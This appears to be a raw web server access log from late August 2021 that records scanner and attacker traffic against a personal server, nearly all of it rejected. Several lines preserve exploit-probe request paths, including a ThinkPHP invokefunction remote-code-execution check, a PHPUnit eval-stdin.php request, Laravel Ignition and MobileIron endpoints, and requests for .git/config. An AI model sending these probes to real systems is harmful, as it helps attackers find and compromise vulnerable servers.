https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:23:46:13 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:23:46:14 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:23:46:16 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:23:46:19 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [27/Aug/2021:23:46:21 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Aug/2021:00:16:33 +0000] 444 - GET https opds.moralanimal.net "/.git/config" [Client 185.100.87.202] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [28/Aug/2021:00:25:18 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Aug/2021:00:25:18 +0000] 444 - GET https agent.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Aug/2021:01:23:59 +0000] 444 - GET https 64.22.31.253 "/" [Client 180.149.125.175] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 5.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.90 Safari/537.36" "-" [28/Aug/2021:01:47:19 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Aug/2021:01:47:20 +0000] 444 - GET https jdownloader.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [28/Aug/2021:03:15:17 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [28/Aug/2021:03:17:33 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Aug/2021:03:49:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.62] [Length 0] [Gzip -] "-" "-" [28/Aug/2021:04:19:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.200.85] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Aug/2021:04:31:04 +0000] 444 - GET https booksonic.moralanimal.net "/.git/config" [Client 185.220.100.243] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [28/Aug/2021:05:25:33 +0000] 400 - - http localhost "-" [Client 66.240.205.34] [Length 154] [Gzip -] "-" "-" [28/Aug/2021:05:46:07 +0000] 400 - GET http fuwu.sogou.com "/404/index.html" [Client 222.186.19.235] [Length 654] [Gzip -] "Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_5_6; en-US) AppleWebKit/530.9 (KHTML, like Gecko) Chrome/ Safari/530.9" "-" [28/Aug/2021:05:46:07 +0000] 400 - - http localhost "-" [Client 222.186.19.235] [Length 154] [Gzip -] "-" "-" [28/Aug/2021:05:52:14 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.113] [Length 0] [Gzip -] "-" "-" [28/Aug/2021:05:52:15 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.113] [Length 252] [Gzip -] "-" "-" [28/Aug/2021:05:52:15 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.113] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [28/Aug/2021:06:50:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.1.248.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Aug/2021:09:06:26 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.251.102.74] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Aug/2021:10:31:17 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.219.185] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Aug/2021:13:32:40 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Aug/2021:16:06:17 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Aug/2021:16:06:17 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Aug/2021:16:06:19 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Aug/2021:16:06:19 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Aug/2021:16:06:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Aug/2021:16:06:22 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Aug/2021:16:06:24 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Aug/2021:16:06:25 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Aug/2021:16:06:27 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [28/Aug/2021:16:06:28 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Aug/2021:16:06:30 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [28/Aug/2021:17:01:25 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Aug/2021:17:01:25 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Aug/2021:17:01:25 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Aug/2021:17:01:25 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Aug/2021:17:01:25 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Aug/2021:17:01:25 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [28/Aug/2021:17:06:34 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.203.121] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Aug/2021:17:20:05 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.195.65] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Aug/2021:17:28:46 +0000] 444 - GET https 64.22.31.253 "/web/index.html" [Client 92.118.160.17] [Length 0] [Gzip -] "Go http package" "-" [28/Aug/2021:17:29:37 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [28/Aug/2021:17:30:05 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.206.122] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Aug/2021:18:37:56 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Aug/2021:20:21:20 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.205.102] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [28/Aug/2021:20:55:21 +0000] 444 - GET https lndshark.moralanimal.net "/" [Client 124.126.78.178] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 8.0; HUAWEI P20 Build/23112) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4472.114 Mobile Safari/537.36 Edg/86" "-" [28/Aug/2021:22:33:05 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [28/Aug/2021:23:17:36 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.198.72] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Aug/2021:04:20:51 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.220.189] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Aug/2021:04:33:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.196] [Length 0] [Gzip -] "-" "-" [29/Aug/2021:07:00:38 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Aug/2021:07:00:40 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Aug/2021:07:00:41 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Aug/2021:07:00:42 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Aug/2021:07:00:42 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Aug/2021:07:00:44 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Aug/2021:07:00:44 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [29/Aug/2021:07:00:45 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Aug/2021:07:00:46 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Aug/2021:07:00:49 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Aug/2021:07:00:49 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [29/Aug/2021:07:08:42 +0000] 444 - GET https imap.moralanimal.net "/" [Client 92.118.160.57] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [29/Aug/2021:07:25:42 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [29/Aug/2021:07:58:03 +0000] 400 - GET http 64.22.31.253 "/" [Client 65.21.240.97] [Length 252] [Gzip -] "colly - https://github.com/gocolly/colly/v2" "-" [29/Aug/2021:07:58:04 +0000] 400 - GET http 64.22.31.253 "/" [Client 65.21.185.124] [Length 252] [Gzip -] "colly - https://github.com/gocolly/colly/v2" "-" [29/Aug/2021:07:58:05 +0000] 400 - GET http 64.22.31.253 "/" [Client 65.21.185.124] [Length 252] [Gzip -] "colly - https://github.com/gocolly/colly/v2" "-" [29/Aug/2021:09:21:07 +0000] 444 - GET https guacamole.moralanimal.net "/" [Client 92.118.160.1] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [29/Aug/2021:09:45:34 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.134] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Aug/2021:10:12:41 +0000] 400 - - http localhost "-" [Client 91.220.163.137] [Length 154] [Gzip -] "-" "-" [29/Aug/2021:10:31:19 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.215.70] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Aug/2021:12:03:11 +0000] 400 - - http localhost "-" [Client 91.220.163.137] [Length 154] [Gzip -] "-" "-" [29/Aug/2021:14:08:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [29/Aug/2021:15:53:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 43.129.202.214] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [29/Aug/2021:15:53:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 43.129.202.214] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [29/Aug/2021:15:53:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 43.129.202.214] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [29/Aug/2021:15:53:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 43.129.202.214] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4 240.111 Safari/537.36" "-" [29/Aug/2021:16:05:16 +0000] 400 - - http localhost "-" [Client 43.129.202.214] [Length 154] [Gzip -] "-" "-" [29/Aug/2021:16:58:13 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.41] [Length 0] [Gzip -] "-" "-" [29/Aug/2021:16:58:14 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.41] [Length 252] [Gzip -] "-" "-" [29/Aug/2021:16:58:14 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.41] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [29/Aug/2021:17:01:30 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Aug/2021:17:01:30 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Aug/2021:17:01:30 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Aug/2021:17:01:30 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Aug/2021:17:01:30 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Aug/2021:17:01:30 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [29/Aug/2021:17:08:06 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.198.225] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Aug/2021:17:20:16 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.219.70] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Aug/2021:17:30:21 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.217.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Aug/2021:18:12:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 213.32.122.82] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [29/Aug/2021:18:12:50 +0000] 400 - GET http 64.22.31.253 "/" [Client 213.32.122.82] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2228.0 Safari/537.36" "-" [29/Aug/2021:18:27:39 +0000] 444 - GET https sql.moralanimal.net "/.git/config" [Client 198.98.48.203] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [29/Aug/2021:19:15:55 +0000] 400 - - http localhost "-" [Client 61.219.11.153] [Length 154] [Gzip -] "-" "-" [29/Aug/2021:19:18:09 +0000] 444 - GET https agent.moralanimal.net "/guacamole/api/tokens" [Client 209.141.53.116] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [29/Aug/2021:19:18:09 +0000] 444 - GET https agent.moralanimal.net "/api/tokens" [Client 209.141.53.116] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0" "-" [29/Aug/2021:19:28:27 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.43] [Length 0] [Gzip -] "-" "-" [29/Aug/2021:19:28:28 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.43] [Length 252] [Gzip -] "-" "-" [29/Aug/2021:19:28:28 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.43] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [29/Aug/2021:21:10:48 +0000] 400 - GET http 64.22.31.253 "/manager/text/list" [Client 192.241.200.198] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Aug/2021:21:20:56 +0000] 444 - GET https booksonic.moralanimal.net "/" [Client 92.118.160.45] [Length 0] [Gzip -] "NetSystemsResearch studies the availability of various services across the internet. Our website is netsystemsresearch.com" "-" [29/Aug/2021:21:33:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [29/Aug/2021:23:20:29 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.213.175] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [29/Aug/2021:23:26:05 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [30/Aug/2021:00:05:29 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 192.241.202.63] [Length 252] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Aug/2021:00:38:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 88.9.119.217] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Aug/2021:02:11:53 +0000] 400 - GET http 64.22.31.253 "/manager/html" [Client 210.175.122.180] [Length 654] [Gzip -] "User-Agent:Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; .NET CLR 1.0.3705" "-" [30/Aug/2021:02:19:48 +0000] 444 - GET https 64.22.31.253 "/" [Client 23.154.177.99] [Length 0] [Gzip -] "Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)" "-" [30/Aug/2021:02:19:53 +0000] 444 - GET https localhost "/nice%20ports%2C/Tri%6Eity.txt%2ebak" [Client 185.247.225.67] [Length 0] [Gzip -] "-" "-" [30/Aug/2021:02:19:57 +0000] 400 - - https localhost "-" [Client 185.247.225.67] [Length 154] [Gzip -] "-" "-" [30/Aug/2021:02:20:08 +0000] 444 - OPTIONS https localhost "/" [Client 185.220.101.13] [Length 0] [Gzip -] "-" "-" [30/Aug/2021:03:22:18 +0000] 444 - GET https 64.22.31.253 "/" [Client 64.62.197.152] [Length 0] [Gzip -] "-" "-" [30/Aug/2021:04:40:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.194.140] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [30/Aug/2021:05:48:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [30/Aug/2021:05:49:08 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:05:49:11 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:05:49:11 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [30/Aug/2021:05:49:12 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) 